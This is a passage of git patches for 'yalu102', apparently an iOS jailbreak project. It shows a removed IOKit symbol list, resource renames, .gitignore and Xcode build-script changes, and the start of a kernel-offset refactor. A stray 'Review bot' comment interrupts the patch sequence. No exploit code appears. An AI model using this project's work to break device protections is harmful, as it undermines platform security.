_IORegistryEntrySetCFProperties, _IORegistryEntrySetCFProperty, - _IORegistryEnumeratorNextConforming, _IORegistryEnumeratorReset, - _IORegistryGetRootEntry, _IORegistryIteratorEnterEntry, - _IORegistryIteratorExitEntry, _IOServiceAddInterestNotification, - _IOServiceAddMatchingNotification, _IOServiceAddNotification, - _IOServiceAuthorize, _IOServiceClose, _IOServiceGetBusyState, - _IOServiceGetBusyStateAndTime, _IOServiceGetMatchingService, - _IOServiceGetMatchingServices, _IOServiceGetState, - _IOServiceMatchPropertyTable, _IOServiceMatching, - _IOServiceNameMatching, 
_IOServiceOFPathToBSDName, - _IOServiceOpen, _IOServiceOpenAsFileDescriptor, - _IOServiceRequestProbe, _IOServiceWaitQuiet, _IOSetNotificationPort, - _IOURLCreateDataAndPropertiesFromResource, _IOURLCreatePropertyFromResource, - _IOUSBDevicDeviceDescriptionGetTypeID, _IOUSBDeviceControllerCreate, - _IOUSBDeviceControllerCreateDefaultDescription, - _IOUSBDeviceControllerCreateWithService, _IOUSBDeviceControllerForceOffBus, - _IOUSBDeviceControllerGetService, _IOUSBDeviceControllerGetTypeID, - _IOUSBDeviceControllerGoOffAndOnBus, _IOUSBDeviceControllerRegisterArrivalCallback, - _IOUSBDeviceControllerRemoveArrivalCallback, _IOUSBDeviceControllerSendCommand, - _IOUSBDeviceControllerSetDescription, _IOUSBDeviceControllerSetPreferredConfiguration, - _IOUSBDeviceDataCreate, _IOUSBDeviceDataGetBytePtr, - _IOUSBDeviceDataGetCapacity, _IOUSBDeviceDataGetMapToken, - _IOUSBDeviceDataGetTypeID, _IOUSBDeviceDescriptionAppendConfiguration, - _IOUSBDeviceDescriptionAppendConfigurationWithInterface, - _IOUSBDeviceDescriptionAppendConfigurationWithInterfaces, - _IOUSBDeviceDescriptionAppendConfigurationWithoutAttributes, - _IOUSBDeviceDescriptionAppendInterfaceToConfiguration, - _IOUSBDeviceDescriptionAppendInterfacesToConfiguration, - _IOUSBDeviceDescriptionCopyInterfaces, _IOUSBDeviceDescriptionCreate, - _IOUSBDeviceDescriptionCreateFromController, _IOUSBDeviceDescriptionCreateFromControllerWithType, - _IOUSBDeviceDescriptionCreateFromDefaults, _IOUSBDeviceDescriptionCreateFromDefaultsAndController, - _IOUSBDeviceDescriptionCreateWithConfigurationInterfaces, - _IOUSBDeviceDescriptionCreateWithType, _IOUSBDeviceDescriptionGetAllowOverride, - _IOUSBDeviceDescriptionGetClass, _IOUSBDeviceDescriptionGetManufacturerString, - _IOUSBDeviceDescriptionGetMatchingConfiguration, - _IOUSBDeviceDescriptionGetProductID, _IOUSBDeviceDescriptionGetProductString, - _IOUSBDeviceDescriptionGetProtocol, _IOUSBDeviceDescriptionGetSerialString, - _IOUSBDeviceDescriptionGetSubClass, 
_IOUSBDeviceDescriptionGetVendorID, - _IOUSBDeviceDescriptionGetVersion, _IOUSBDeviceDescriptionRemoveAllConfigurations, - _IOUSBDeviceDescriptionSetAllowOverride, _IOUSBDeviceDescriptionSetClass, - _IOUSBDeviceDescriptionSetProductID, _IOUSBDeviceDescriptionSetProtocol, - _IOUSBDeviceDescriptionSetSerialString, _IOUSBDeviceDescriptionSetSubClass, - _IOUSBDeviceDescriptionSetVendorID, _NXClickTime, - _NXCloseEventStatus, _NXEventSystemInfo, _NXGetClickSpace, - _NXGetKeyMapping, _NXKeyMappingLength, _NXKeyRepeatInterval, - _NXKeyRepeatThreshold, _NXOpenEventStatus, _NXResetKeyboard, - _NXResetMouse, _NXSetClickSpace, _NXSetClickTime, - _NXSetKeyMapping, _NXSetKeyRepeatInterval, _NXSetKeyRepeatThreshold, - _OSGetNotificationFromMessage, _OSKextAuthenticate, - _OSKextAuthenticateDependencies, _OSKextCopyAllDependencies, - _OSKextCopyAllRequestedIdentifiers, _OSKextCopyArchitectures, - _OSKextCopyContainerForPluginKext, _OSKextCopyDeclaredDependencies, - _OSKextCopyDependents, _OSKextCopyDiagnostics, _OSKextCopyExecutableForArchitecture, - _OSKextCopyIndirectDependencies, _OSKextCopyInfoDictionary, - _OSKextCopyKextsWithIdentifier, _OSKextCopyKextsWithIdentifiers, - _OSKextCopyLinkDependencies, _OSKextCopyLoadList, - _OSKextCopyLoadListForKexts, _OSKextCopyLoadedKextInfo, - _OSKextCopyPersonalitiesArray, _OSKextCopyPersonalitiesOfKexts, - _OSKextCopyPlugins, _OSKextCopyResource, _OSKextCopyUUIDForArchitecture, - _OSKextCreate, _OSKextCreateKextsFromMkextData, - _OSKextCreateKextsFromMkextFile, _OSKextCreateKextsFromURL, - _OSKextCreateKextsFromURLs, _OSKextCreateLoadedKextInfo, - _OSKextCreateMkext, _OSKextCreateWithIdentifier, - _OSKextDeclaresExecutable, _OSKextDependenciesAreLoadableInSafeBoot, - _OSKextDependsOnKext, _OSKextFilterRequiredKexts, - _OSKextFindLinkDependencies, _OSKextFlushDependencies, - _OSKextFlushDiagnostics, _OSKextFlushInfoDictionary, - _OSKextFlushLoadInfo, _OSKextGetActualSafeBoot, - _OSKextGetAllKexts, _OSKextGetArchitecture, 
_OSKextGetCompatibleKextWithIdentifier, - _OSKextGetCompatibleVersion, _OSKextGetIdentifier, - _OSKextGetKextWithIdentifier, _OSKextGetKextWithIdentifierAndVersion, - _OSKextGetKextWithURL, _OSKextGetLoadAddress, _OSKextGetLoadTag, - _OSKextGetLoadedKextWithIdentifier, _OSKextGetLogFilter, - _OSKextGetRecordsDiagnostics, _OSKextGetRunningKernelArchitecture, - _OSKextGetSimulatedSafeBoot, _OSKextGetSystemExtensionsFolderURLs, - _OSKextGetTypeID, _OSKextGetURL, _OSKextGetUsesCaches, - _OSKextGetValueForInfoDictionaryKey, _OSKextGetVersion, - _OSKextHasLogOrDebugFlags, _OSKextIsAuthentic, _OSKextIsCompatibleWithVersion, - _OSKextIsFromMkext, _OSKextIsInterface, _OSKextIsKernelComponent, - _OSKextIsLibrary, _OSKextIsLoadable, _OSKextIsLoadableInSafeBoot, - _OSKextIsLoaded, _OSKextIsLoggingEnabled, _OSKextIsPlugin, - _OSKextIsStarted, _OSKextIsValid, _OSKextLoad, _OSKextLoadWithOptions, - _OSKextLog, _OSKextLogCFString, _OSKextLogDependencyGraph, - _OSKextLogDiagnostics, _OSKextMatchesRequiredFlags, - _OSKextOtherVersionIsLoaded, _OSKextParseVersionCFString, - _OSKextParseVersionString, _OSKextReadLoadedKextInfo, - _OSKextRemoveKextPersonalitiesFromKernel, _OSKextRemovePersonalitiesForIdentifierFromKernel, - _OSKextResolveDependencies, _OSKextSendKextPersonalitiesToKernel, - _OSKextSendPersonalitiesOfKextsToKernel, _OSKextSendPersonalitiesToKernel, - _OSKextSetArchitecture, _OSKextSetLoadAddress, _OSKextSetLogFilter, - _OSKextSetLogOutputFunction, _OSKextSetLoggingEnabled, - _OSKextSetRecordsDiagnostics, _OSKextSetSimulatedSafeBoot, - _OSKextSetUsesCaches, _OSKextStart, _OSKextStop, - _OSKextSupportsArchitecture, _OSKextUnload, _OSKextUnloadKextWithIdentifier, - _OSKextVLog, _OSKextVLogCFString, _OSKextValidate, - _OSKextValidateDependencies, _OSKextVersionGetString, - __CFURLCopyAbsolutePath, __IOAVStringAppendIndendationAndFormat, - __IODataQueueEnqueueWithReadCallback, __IODispatchCalloutWithDispatch, - __IOHIDCallbackApplier, __IOHIDCopyServiceIDs, 
__IOHIDCreateBinaryData, - __IOHIDDeviceGetIOCFPlugInInterface, __IOHIDElementCreateWithElement, - __IOHIDElementCreateWithParentAndData, __IOHIDElementGetCalibrationInfo, - __IOHIDElementGetFlags, __IOHIDElementGetLength, - __IOHIDElementGetValue, __IOHIDElementSetDevice, - __IOHIDElementSetDeviceInterface, __IOHIDElementSetValue, - __IOHIDEventCopyCFTypeContext, __IOHIDEventGetContext, - __IOHIDEventSetCFTypeContext, __IOHIDEventSetContext, - __IOHIDEventSystemAddConnection, __IOHIDEventSystemAddService, - __IOHIDEventSystemAddServiceForConnection, __IOHIDEventSystemClientCopyClientRecords, - __IOHIDEventSystemClientCopyEventForService, __IOHIDEventSystemClientCopyPropertyForService, - __IOHIDEventSystemClientCopyServiceRecords, __IOHIDEventSystemClientDispatchEventFilter, - __IOHIDEventSystemClientDispatchPropertiesChanged, - __IOHIDEventSystemClientRegisterClientRecordsChangedBlock, - __IOHIDEventSystemClientRegisterClientRecordsChangedCallback, - __IOHIDEventSystemClientRegisterServiceRecordsChangedBlock, - __IOHIDEventSystemClientRegisterServiceRecordsChangedCallback, - __IOHIDEventSystemClientServiceConformsTo, __IOHIDEventSystemClientSetElementValueForService, - __IOHIDEventSystemClientSetPropertyForService, __IOHIDEventSystemClientUnregisterClientRecordsChangedBlock, - __IOHIDEventSystemClientUnregisterClientRecordsChangedCallback, - __IOHIDEventSystemClientUnregisterServiceRecordsChangedBlock, - __IOHIDEventSystemClientUnregisterServiceRecordsChangedCallback, - __IOHIDEventSystemConnectionAddNotification, __IOHIDEventSystemConnectionAddServices, - __IOHIDEventSystemConnectionContainsEntitlement, - __IOHIDEventSystemConnectionContainsService, __IOHIDEventSystemConnectionCopyQueue, - __IOHIDEventSystemConnectionCopyRecord, __IOHIDEventSystemConnectionCopyServices, - __IOHIDEventSystemConnectionCreate, __IOHIDEventSystemConnectionEventFilterCompare, - __IOHIDEventSystemConnectionFilterEvent, __IOHIDEventSystemConnectionGetEventFilterPriority, - 
__IOHIDEventSystemConnectionGetExecutablePath, __IOHIDEventSystemConnectionGetPID, - __IOHIDEventSystemConnectionGetPort, __IOHIDEventSystemConnectionGetReplyPort, - __IOHIDEventSystemConnectionGetSystem, __IOHIDEventSystemConnectionPropertyChanged, - __IOHIDEventSystemConnectionQueueStart, __IOHIDEventSystemConnectionQueueStop, - __IOHIDEventSystemConnectionRecordClientChanged, - __IOHIDEventSystemConnectionRecordServiceChanged, - __IOHIDEventSystemConnectionRegisterDemuxCallback, - __IOHIDEventSystemConnectionRegisterEventFilter, - __IOHIDEventSystemConnectionRegisterPropertyChangedNotification, - __IOHIDEventSystemConnectionRegisterRecordClientChanged, - __IOHIDEventSystemConnectionRegisterRecordServiceChanged, - __IOHIDEventSystemConnectionRegisterTerminationCallback, - __IOHIDEventSystemConnectionRemoveAllServices, __IOHIDEventSystemConnectionRemoveNotification, - __IOHIDEventSystemConnectionRemoveService, __IOHIDEventSystemConnectionScheduleAsync, - __IOHIDEventSystemConnectionSetQueue, __IOHIDEventSystemConnectionUnregisterEventFilter, - __IOHIDEventSystemConnectionUnregisterPropertyChangedNotification, - __IOHIDEventSystemConnectionUnregisterRecordClientChanged, - __IOHIDEventSystemConnectionUnregisterRecordServiceChanged, - __IOHIDEventSystemConnectionUnscheduleAsync, __IOHIDEventSystemCopyRecord, - __IOHIDEventSystemDispatchEvent, __IOHIDEventSystemGetPropertyForConnection, - __IOHIDEventSystemPropertyChanged, __IOHIDEventSystemRegisterEventFilter, - __IOHIDEventSystemRegisterRecordClientChanged, __IOHIDEventSystemRegisterRecordServiceChanged, - __IOHIDEventSystemRemoveConnection, __IOHIDEventSystemRemoveService, - __IOHIDEventSystemRemoveServicesForConnection, __IOHIDEventSystemSetPropertyForConnection, - __IOHIDEventSystemUnregisterEventFilter, __IOHIDEventSystemUnregisterRecordClientChanged, - __IOHIDEventSystemUnregisterRecordServiceChanged, - __IOHIDHasEntitlement, __IOHIDLoadBundles, __IOHIDLog, - __IOHIDQueueCopyElements, __IOHIDSerialize, 
__IOHIDServiceAddConnection, - __IOHIDServiceClientCreate, __IOHIDServiceClientDispatchServiceRemoval, - __IOHIDServiceClientRefresh, __IOHIDServiceClose, - __IOHIDServiceContainsReportInterval, __IOHIDServiceContainsReportIntervalForClient, - __IOHIDServiceCopyConnections, __IOHIDServiceCopyDebugDescriptionForClient, - __IOHIDServiceCopyDispatchQueue, __IOHIDServiceCopyPropertyForClient, - __IOHIDServiceCopyRecordForClient, __IOHIDServiceCreate, - __IOHIDServiceCreateVirtual, __IOHIDServiceGetEventDeadlineForClient, - __IOHIDServiceGetOwner, __IOHIDServiceGetReportInterval, - __IOHIDServiceGetReportIntervalForClient, __IOHIDServiceIsInactive, - __IOHIDServiceOpen, __IOHIDServiceRemoveConnection, - __IOHIDServiceRemovePropertiesForClient, __IOHIDServiceScheduleAsync, - __IOHIDServiceSetBatchIntervalForClient, __IOHIDServiceSetEventCallback, - __IOHIDServiceSetEventDeadlineForClient, __IOHIDServiceSetPropertyForClient, - __IOHIDServiceSetReportIntervalForClient, __IOHIDServiceUnscheduleAsync, - __IOHIDSessionDispatchEvent, __IOHIDSessionGetPropertyForClient, - __IOHIDSessionSetPropertyForClient, __IOHIDStringAppendIndendationAndFormat, - __IOHIDUnserializeAndVMDealloc, __IOHIDUnserializeAndVMDeallocWithTypeID, - __IOHIDValueCopyToElementValuePtr, __IOHIDValueCreateWithElementValuePtr, - __IOHIDValueCreateWithStruct, __IOObjectCFRelease, - __IOObjectCFRetain, __IOObjectConformsTo, __IOObjectCopyClass, - __IOObjectGetClass, __IOReadBytesFromFile, __IOServiceGetAuthorizationID, - __IOServiceSetAuthorizationID, __IOUSBDeviceDescriptionGetInfo, - __IOWriteBytesToFile, __OSKextCopyKernelRequests, - __OSKextCreateFolderForCacheURL, __OSKextReadCache, - __OSKextReadFromIdentifierCacheForFolder, __OSKextSendResource, - __OSKextSetStrictRecordingByLastOpened, __OSKextWriteCache, - __OSKextWriteIdentifierCacheForKextsInDirectory, - ___CachedPropertiesRefreshApplierFunction, ___ConnectionFunctionPickBatchInterval, - ___GDBIOHIDEventSystemDump, 
___IOHIDApplyPropertiesToDeviceFromDictionary, - ___IOHIDApplyPropertyToDeviceSet, ___IOHIDDeviceGetRootKey, - ___IOHIDDeviceGetUUIDKey, ___IOHIDDeviceGetUUIDString, - ___IOHIDDeviceLoadProperties, ___IOHIDDeviceSaveProperties, - ___IOHIDElementGetRootKey, ___IOHIDElementLoadProperties, - ___IOHIDElementRegister, ___IOHIDElementSaveProperties, - ___IOHIDEventSystemClientRefresh, ___IOHIDEventSystemClientRefreshServiceCallback, - ___IOHIDEventSystemClientServiceReplaceCallback, - ___IOHIDEventSystem_debug, ___IOHIDLoadElementSet, - ___IOHIDManagerGetRootKey, ___IOHIDManagerLoadProperties, - ___IOHIDManagerRegister, ___IOHIDManagerSaveProperties, - ___IOHIDNotificationRegister, ___IOHIDPropertyLoadDictionaryFromKey, - ___IOHIDPropertyLoadFromKeyWithSpecialKeys, ___IOHIDPropertySaveToKeyWithSpecialKeys, - ___IOHIDPropertySaveWithContext, ___IOHIDQueueRegister, - ___IOHIDSaveDeviceSet, ___IOHIDSaveElementSet, ___IOHIDServicePickBatchInterval, - ___IOHIDSession, ___IOHIDSessionRef, ___IOHIDTransactionRegister, - ___IOHIDValueRegister, ___IOUSBDeviceDescriptionRegister, - ___OSKextBundleIDCompare, ___OSKextCacheNeedsUpdate, - ___OSKextCheckURL, ___OSKextClearHasAllDependenciesOnKext, - ___OSKextCompareIdentifiers, ___OSKextCopyExecutableRelativePath, - ___OSKextCreateCacheFileURL, ___OSKextCreateCompositeKey, - ___OSKextCreateFromIdentifierCacheDict, ___OSKextCreateIdentifierCacheDict, - ___OSKextCreateKextRequest, ___OSKextDeallocateMmapBuffer, - ___OSKextGetBleedthroughFlag, ___OSKextLogDependencyGraphApplierFunction, - ___OSKextLogKernelMessages, ___OSKextMapExecutable, - ___OSKextProcessKextRequestResults, ___OSKextReadRegistryNumberProperty, - ___OSKextRealize, ___OSKextRealizeKextsWithIdentifier, - ___OSKextRemoveIdentifierCacheForKext, ___OSKextRemovePersonalities, - ___OSKextSendKextRequest, ___OSKextSetLoadAddress, - ___OSKextStatURL, ___OSKextStatURLsOrURL, ___OSKextURLIsSystemFolder, - ___OSKextUUIDCallback, ___OSKextUnload, ___SetNumPropertyForService, - 
___absPathOnVolume, ___kOSKextDiagnosticsFlagAllImplemented, - ___sOSKextDefaultLogFunction, ___sOSKextLogOutputFunction, - ___uuid_callback, __io_hideventsystem_clear_service_cache, - __io_hideventsystem_copy_client_records, __io_hideventsystem_copy_event_for_service, - __io_hideventsystem_copy_matching_services, __io_hideventsystem_copy_property, - __io_hideventsystem_copy_property_for_service, __io_hideventsystem_copy_service_records, - __io_hideventsystem_dispatch_event, __io_hideventsystem_open, - __io_hideventsystem_queue_create, __io_hideventsystem_queue_start, - __io_hideventsystem_queue_stop, __io_hideventsystem_register_event_filter, - __io_hideventsystem_register_property_changed_notification, - __io_hideventsystem_register_record_client_changed_notification, - __io_hideventsystem_register_record_service_changed_notification, - __io_hideventsystem_release_notification, __io_hideventsystem_service_conforms_to, - __io_hideventsystem_set_element_value_for_service, - __io_hideventsystem_set_properties, __io_hideventsystem_set_properties_for_service, - __io_hideventsystem_unregister_event_filter, __io_hideventsystem_unregister_property_changed_notification, - __io_hideventsystem_unregister_record_client_changed_notification, - __io_hideventsystem_unregister_record_service_changed_notification, - __io_kSCCompAnyRegex, __io_kSCDynamicStoreDomainState, - __iohideventsystem_client_dispatch_client_records_changed, - __iohideventsystem_client_dispatch_event_filter, - __iohideventsystem_client_dispatch_notification_results, - __iohideventsystem_client_dispatch_properties_changed, - __iohideventsystem_client_dispatch_service_records_changed, - __iohideventsystem_client_dispatch_service_removal, - __iohideventsystem_client_subsystem, __iohideventsystem_subsystem, - __isArray, __isDictionary, __isString, __pm_connect, - __pm_disconnect, _createCFStringForData, _createCFStringForPlist_new, - _createUTF8CStringForCFString, _defaultSettings, - _ev_try_lock, _ev_unlock, 
_fat_iterator_close, _fat_iterator_file_end, - _fat_iterator_file_start, _fat_iterator_find_arch, - _fat_iterator_find_fat_arch, _fat_iterator_find_host_arch, - _fat_iterator_for_data, _fat_iterator_is_iterable, - _fat_iterator_next_arch, _fat_iterator_num_arches, - _fat_iterator_open, _fat_iterator_reset, _gIOCFPlugInInterfaceID, - _gIOKitLibSerializeOptions, _gIOKitLibServerVersion, - _getEffectivePageSize, _hid_dispatch_pthread_root_queue_create, - _hid_dispatch_queue_create, _hid_dispatch_queue_release, - _hid_pthread_attr_init, _io_hideventsystem_clear_service_cache, - _io_hideventsystem_copy_client_records, _io_hideventsystem_copy_event_for_service, - _io_hideventsystem_copy_matching_services, _io_hideventsystem_copy_property, - _io_hideventsystem_copy_property_for_service, _io_hideventsystem_copy_service_records, - _io_hideventsystem_dispatch_event, _io_hideventsystem_open, - _io_hideventsystem_queue_create, _io_hideventsystem_queue_start, - _io_hideventsystem_queue_stop, _io_hideventsystem_register_event_filter, - _io_hideventsystem_register_property_changed_notification, - _io_hideventsystem_register_record_client_changed_notification, - _io_hideventsystem_register_record_service_changed_notification, - _io_hideventsystem_release_notification, _io_hideventsystem_service_conforms_to, - _io_hideventsystem_set_element_value_for_service, - _io_hideventsystem_set_properties, _io_hideventsystem_set_properties_for_service, - _io_hideventsystem_unregister_event_filter, _io_hideventsystem_unregister_property_changed_notification, - _io_hideventsystem_unregister_record_client_changed_notification, - _io_hideventsystem_unregister_record_service_changed_notification, - _io_pm_assertion_activity_aggregate, _io_pm_assertion_activity_log, - _io_pm_assertion_copy_details, _io_pm_assertion_create, - _io_pm_assertion_notify, _io_pm_assertion_retain_release, - _io_pm_assertion_set_properties, _io_pm_cancel_repeat_events, - _io_pm_change_sa_assertion_behavior, 
_io_pm_connection_acknowledge_event, - _io_pm_connection_copy_status, _io_pm_connection_create, - _io_pm_connection_release, _io_pm_connection_schedule_notification, - _io_pm_ctl_assertion_type, _io_pm_declare_network_client_active, - _io_pm_declare_system_active, _io_pm_declare_user_active, - _io_pm_force_active_settings, _io_pm_get_capability_bits, - _io_pm_get_uuid, _io_pm_get_value_int, _io_pm_hid_event_copy_history, - _io_pm_hid_event_report_activity, _io_pm_last_wake_time, - _io_pm_schedule_power_event, _io_pm_schedule_repeat_event, - _io_pm_set_active_profile, _io_pm_set_bt_wake_interval, - _io_pm_set_debug_flags, _io_pm_set_dw_linger_interval, - _io_pm_set_sleepservice_wake_time_cap, _io_pm_set_value_int, - _io_ps_copy_chargelog, _io_ps_copy_powersources_info, - _io_ps_new_pspowersource, _io_ps_release_pspowersource, - _io_ps_update_pspowersource, _iohideventsystem_client_dispatch_client_records_changed, - _iohideventsystem_client_dispatch_event_filter, - _iohideventsystem_client_dispatch_notification_results, - _iohideventsystem_client_dispatch_properties_changed, - _iohideventsystem_client_dispatch_service_records_changed, - _iohideventsystem_client_dispatch_service_removal, - _iohideventsystem_client_server, _iohideventsystem_client_server_routine, - _iohideventsystem_server, _iohideventsystem_server_routine, - _iokit_user_client_trap, _isCrossLinking, _kIOEthernetHardwareAddress, - _kIOHIDEventSystemConnectionDispatchFilterWaitTimeoutMS, - _kIOHIDFilterPluginArrayCallBacks, _kIOHIDServerConnectionRootQueue, - _kIOHIDServiceEnumerationRootQueue, _kIOHIDServiceInterruptRootQueue, - _kIOMasterPortDefault, _kIOUserEthernetInterfaceMergeProperties, - _kIOUserEthernetInterfaceRole, _kOSKextDependencyCircularReference, - _kOSKextDependencyCompatibleVersionUndeclared, _kOSKextDependencyInauthentic, - _kOSKextDependencyIndirectDependencyUnresolvable, - _kOSKextDependencyIneligibleInSafeBoot, _kOSKextDependencyInvalid, - 
_kOSKextDependencyLoadedCompatibleVersionUndeclared, - _kOSKextDependencyLoadedIsIncompatible, _kOSKextDependencyMultipleVersionsDetected, - _kOSKextDependencyNoCompatibleVersion, _kOSKextDependencyRawAndComponentKernel, - _kOSKextDependencyUnavailable, _kOSKextDiagnosticBadPropertyListXMLKey, - _kOSKextDiagnosticBadSystemPropertyKey, _kOSKextDiagnosticBundleIdentifierMismatchKey, - _kOSKextDiagnosticBundleVersionMismatchKey, _kOSKextDiagnosticCodelessWithLibrariesKey, - _kOSKextDiagnosticCompatibleVersionLaterThanVersionKey, - _kOSKextDiagnosticDeclaresBothKernelAndKPIDependenciesKey, - _kOSKextDiagnosticDeclaresNoKPIsWarningKey, _kOSKextDiagnosticDeclaresNonKPIDependenciesKey, - _kOSKextDiagnosticDeprecatedPropertyKey, _kOSKextDiagnosticExecutableArchNotFoundKey, - _kOSKextDiagnosticExecutableBadKey, _kOSKextDiagnosticExecutableMissingKey, - _kOSKextDiagnosticFileAccessKey, _kOSKextDiagnosticFileNotFoundKey, - _kOSKextDiagnosticIdentifierOrVersionTooLongKey, - _kOSKextDiagnosticIneligibleInSafeBoot, _kOSKextDiagnosticKernelComponentNotInterfaceKey, - _kOSKextDiagnosticMissingPropertyKey, _kOSKextDiagnosticNoExplicitKernelDependencyKey, - _kOSKextDiagnosticNoFileKey, _kOSKextDiagnosticNonAppleKextDeclaresPrivateKPIDependencyKey, - _kOSKextDiagnosticNonuniqueIOResourcesMatchKey, - _kOSKextDiagnosticNotABundleKey, _kOSKextDiagnosticNotSignedKey, - _kOSKextDiagnosticOwnerPermissionKey, _kOSKextDiagnosticPersonalityHasDifferentBundleIdentifierKey, - _kOSKextDiagnosticPersonalityHasNoBundleIdentifierKey, - _kOSKextDiagnosticPersonalityNamesKextWithNoExecutableKey, - _kOSKextDiagnosticPersonalityNamesNonloadableKextKey, - _kOSKextDiagnosticPersonalityNamesUnknownKextKey, - _kOSKextDiagnosticPropertyIsIllegalTypeKey, _kOSKextDiagnosticPropertyIsIllegalValueKey, - _kOSKextDiagnosticRawKernelDependency, _kOSKextDiagnosticSharedExecutableAndExecutableKey, - _kOSKextDiagnosticSharedExecutableKextMissingKey, - _kOSKextDiagnosticStatFailureKey, _kOSKextDiagnosticSymlinkKey, - 
_kOSKextDiagnosticTypeWarningKey, _kOSKextDiagnosticURLConversionKey, - _kOSKextDiagnosticsAuthenticationKey, _kOSKextDiagnosticsBootLevelKey, - _kOSKextDiagnosticsDependenciesKey, _kOSKextDiagnosticsDependencyNotOSBundleRequired, - _kOSKextDiagnosticsInterfaceDependencyCount, _kOSKextDiagnosticsValidationKey, - _kOSKextDiagnosticsWarningsKey, _kOSKextLoadNotification, - _kOSKextUnloadNotification, _macho_find_dysymtab, - _macho_find_section_numbered, _macho_find_source_version, - _macho_find_symbol, _macho_find_symtab, _macho_find_uuid, - _macho_get_section_by_name, _macho_get_section_by_name_64, - _macho_get_segment_by_name, _macho_get_segment_by_name_64, - _macho_remove_linkedit, _macho_scan_load_commands, - _macho_swap, _macho_trim_linkedit, _macho_unswap, - _previouslySerialized, _printPList_new, _recordObjectInIDRefDictionary, - _roundPageCrossSafe, _roundPageCrossSafeFixedWidth, - _setCrossLinkPageSize, _showPList_new ] -... diff --git a/yalu102/0.reload.plist b/yalu102/Resources/0.reload.plist similarity index 100% rename from yalu102/0.reload.plist rename to yalu102/Resources/0.reload.plist diff --git a/yalu102/bootstrap.tar b/yalu102/Resources/bootstrap.tar similarity index 100% rename from yalu102/bootstrap.tar rename to yalu102/Resources/bootstrap.tar diff --git a/yalu102/launchctl b/yalu102/Resources/launchctl similarity index 100% rename from yalu102/launchctl rename to yalu102/Resources/launchctl diff --git a/yalu102/reload b/yalu102/Resources/reload similarity index 100% rename from yalu102/reload rename to yalu102/Resources/reload diff --git a/yalu102/tar b/yalu102/Resources/tar old mode 100644 new mode 100755 similarity index 100% rename from yalu102/tar rename to yalu102/Resources/tar From d4d316924d027c220a3e4743c17814cd24ea77c3 Mon Sep 17 00:00:00 2001 
From: Oliver Kuckertz
Date: Sat, 28 Jan 2017 19:09:28 +0100
Subject: [PATCH 06/34] Add bootstrap.tar temporary directory to .gitignore

---
 yalu102/Resources/.gitignore | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 yalu102/Resources/.gitignore

diff --git a/yalu102/Resources/.gitignore b/yalu102/Resources/.gitignore
new file mode 100644
index 0000000..b7c200a
--- /dev/null
+++ b/yalu102/Resources/.gitignore
@@ -0,0 +1 @@
+bootstrap
From 60c2139ee7b24cae25431d908fa4afb0c728d08b Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sat, 28 Jan 2017 19:12:56 +0100
Subject: [PATCH 07/34] Use iOS libkern headers with OSTypes.h from macOS

This avoids clashes if any iOS library should depend on quirks of the iOS libkern headers or includes them directly. However, OSTypes.h is missing from the iOS SDK. The rather short file from the macOS SDK is compatible.

---
 yalu102.xcodeproj/project.pbxproj | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj
index 815b12f..3d08201 100644
--- a/yalu102.xcodeproj/project.pbxproj
+++ b/yalu102.xcodeproj/project.pbxproj
@@ -245,7 +245,7 @@
 );
 runOnlyForDeploymentPostprocessing = 0;
 shellPath = /bin/sh;
- shellScript = "set -x\nset -e\nDESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=\"$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\"\nif [ ! -e \"$DESTPATH/IOKit\" ]; then\n ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\nfi\nif [ ! -e \"$DESTPATH/libkern\" ]; then\n ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\nfi\n";
+ shellScript = "set -x\nset -e\nDESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=\"$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\"\nif [ ! -e \"$DESTPATH/IOKit\" ]; then\n ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\nfi\n\nif [ ! -e \"$DESTPATH/libkern\" ]; then\n mkdir -p \"$DESTPATH/libkern\"\n ln -s \"$MACOSSDK/usr/include/libkern/OSTypes.h\" \"$DESTPATH/libkern/OSTypes.h\"\nfi\n";
 };
 /* End PBXShellScriptBuildPhase section */
 
From c6d404b412491912b5cce963540e73a24b5a8f9f Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sat, 28 Jan 2017 19:20:42 +0100
Subject: [PATCH 08/34] Clear automated code signing settings

---
 yalu102.xcodeproj/project.pbxproj | 1 -
 1 file changed, 1 deletion(-)

diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj
index d228134..339b0ba 100644
--- a/yalu102.xcodeproj/project.pbxproj
+++ b/yalu102.xcodeproj/project.pbxproj
@@ -169,7 +169,6 @@
 TargetAttributes = {
 EA9900E21E1E9F060056FEBD = {
 CreatedOnToolsVersion = 8.2.1;
- DevelopmentTeam = CGTX3WH3ZS;
 ProvisioningStyle = Automatic;
 };
 };
From da39f9bf4e4d53f795e3b7351afe76e3377609eb Mon Sep 17 00:00:00 2001
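Review bot: The new `if [ ! -e "$DESTPATH/libkern" ]` guard cannot tell a directory created by this version of the script from the whole-directory symlink created by the removed line, because `-e` follows the link; a checkout that was built with the previous revision therefore keeps compiling against the full macOS libkern headers that this commit means to stop using. Remove a stale link before the test, e.g. `[ -L "$DESTPATH/libkern" ] && rm "$DESTPATH/libkern"`. The script also never verifies that `$MACOSSDK` exists: a wrong `PLATFORM_DIR` layout leaves dangling links on the first build and a confusing `ln: File exists` abort (via `set -e`) on every later one, so a `[ -d "$MACOSSDK" ] || { echo "MacOSX.sdk not found" >&2; exit 1; }` line right after the assignment would fail the build with a readable message.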
From: Oliver Kuckertz
Date: Sun, 29 Jan 2017 14:57:08 +0100
Subject: [PATCH 09/34] Refactor offsets.c into Kernels.plist, remove devicesupport.h/m

---
 yalu102.xcodeproj/project.pbxproj | 31 +--
 yalu102/AppDelegate.h | 2 -
 yalu102/AppDelegate.m | 7 -
 yalu102/Kernels.plist | 260 ++++++++++++++++++++++
 yalu102/Resources/reload | 1 -
 yalu102/ViewController.m | 24 +-
 yalu102/csflags.h | 26 +++
 yalu102/devicesupport.m | 50 -----
